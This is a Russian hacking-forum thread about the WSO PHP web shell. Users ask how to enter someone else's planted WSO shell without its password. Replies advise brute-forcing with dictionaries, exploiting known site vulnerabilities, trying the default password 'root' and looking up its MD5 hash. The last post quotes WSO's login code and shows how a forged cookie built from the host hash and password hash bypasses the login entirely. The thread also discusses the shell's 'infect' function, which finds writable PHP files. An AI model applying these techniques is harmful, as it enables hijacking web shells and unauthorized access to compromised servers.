 |
|
20.12.2016, 12:03
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от GTAlex
↑
собственно, вопрос как раз был о том, чтобы не парсить
думал, может есть более удобный инструмент для удалённого запуска PHP скриптов
Впринцепи я вам четко ответил по вашему вопросу, а дальше думайте сами как хотите....
|
|
|
20.12.2016, 12:05
|
|
Новичок
Регистрация: 07.09.2009
Сообщений: 1
С нами:
8777319
Репутация:
0
|
|
Да, спасибо - регулярка элементарная.
Именно этот вариант сейчас в работе.
|
|
|
|
03.01.2017, 03:38
|
|
Новичок
Регистрация: 06.12.2016
Сообщений: 5
С нами:
4966166
Репутация:
0
|
|
подскажите пожалуйста
есть адрес ВСО, очень надо войти а паса нету, есть ли возможность как то узнать пас или войти без него?
|
|
|
|
04.01.2017, 05:57
|
|
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
С нами:
11353286
Репутация:
2944
|
|
Сообщение от demok
↑
подскажите пожалуйста
есть адрес ВСО, очень надо войти а паса нету, есть ли возможность как то узнать пас или войти без него?
Узнать пас не получится, попробуй побрутить доступ к шелу по стандартным словарям, либо проверь сайт на известные уязвимости. Если шел до сих пор там, значит и уязвимости актуальны.
|
|
|
|
28.01.2017, 19:33
|
|
Новичок
Регистрация: 03.06.2015
Сообщений: 12
С нами:
5761046
Репутация:
0
|
|
Скажите а что делает функция infect в wso? Ясно что она заражает сервер, но что именно?
|
|
|
|
29.01.2017, 01:28
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 661
С нами:
5344886
Репутация:
441
|
|
Сообщение от artur1111
↑
Скажите а что делает функция infect в wso? Ясно что она заражает сервер, но что именно?
В чистом WSO нет такого. Функция может делать что угодно, но точно ничего путного. Возможно ифреймер.
|
|
|
|
30.01.2017, 20:48
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от artur1111
↑
Скажите а что делает функция infect в wso? Ясно что она заражает сервер, но что именно?
Может делать все то, что в нее заложил прогер, покажите код и мы вам объясним, что к чему!
|
|
|
|
31.01.2017, 21:35
|
|
Новичок
Регистрация: 03.06.2015
Сообщений: 12
С нами:
5761046
Репутация:
0
|
|
Сообщение от winstrool
↑
Может делать все то, что в нее заложил прогер, покажите код и мы вам объясним, что к чему!
Уже узнал! она ищет .php файлы которые можно изменить, и выводит список с именами.
|
|
|
|
25.05.2017, 19:13
|
|
Участник форума
Регистрация: 19.10.2016
Сообщений: 121
С нами:
5035286
Репутация:
2
|
|
Сообщение от demok
↑
подскажите пожалуйста
есть адрес ВСО, очень надо войти а паса нету, есть ли возможность как то узнать пас или войти без него?
Пароль root, если он не подходит найди в начале скрипта MD5 хеш и вставь его в гугл строку поиска, тогда найдёшь пароль от шелла
|
|
|
|
26.05.2017, 11:17
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Dr_Wile
↑
Пароль root, если он не подходит найди в начале скрипта MD5 хеш и вставь его в гугл строку поиска, тогда найдёшь пароль от шелла
Ну так полагаю, что T.C не знает хэша, а вообще, при наличие хэша не обязательно его брутить!!!
Давайте посмотрим в сторону кода самого шела как происходит авторизация:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"63a9f0ea7bb98050796b649e85481845"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]//пусть условно будет пароль root
//..........
[/COLOR][COLOR="#007700"]if(!empty([/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#FF8000"]//если присутствует пароль
[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) && ([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#FF8000"]// и пароль равен его хэшь сумме
[/COLOR][COLOR="#0000BB"]WSOsetcookie[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]]),[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// отправляем куку с параметром хэшь хоста и значением хэшь пароля
[/COLOR][COLOR="#007700"]if (!isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])]) || ([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])] !=[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]))
[/COLOR][COLOR="#0000BB"]wsoLogin[/COLOR][COLOR="#007700"]();
}[/COLOR][/COLOR]
предположим что у нас HOST: localhost
тогда нам для авторизации, при известном хэше, достаточно будет вставить куку:
421aa90e079fa326b6494f812ad13e79=63a9f0ea7bb980507 96b649e85481845
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
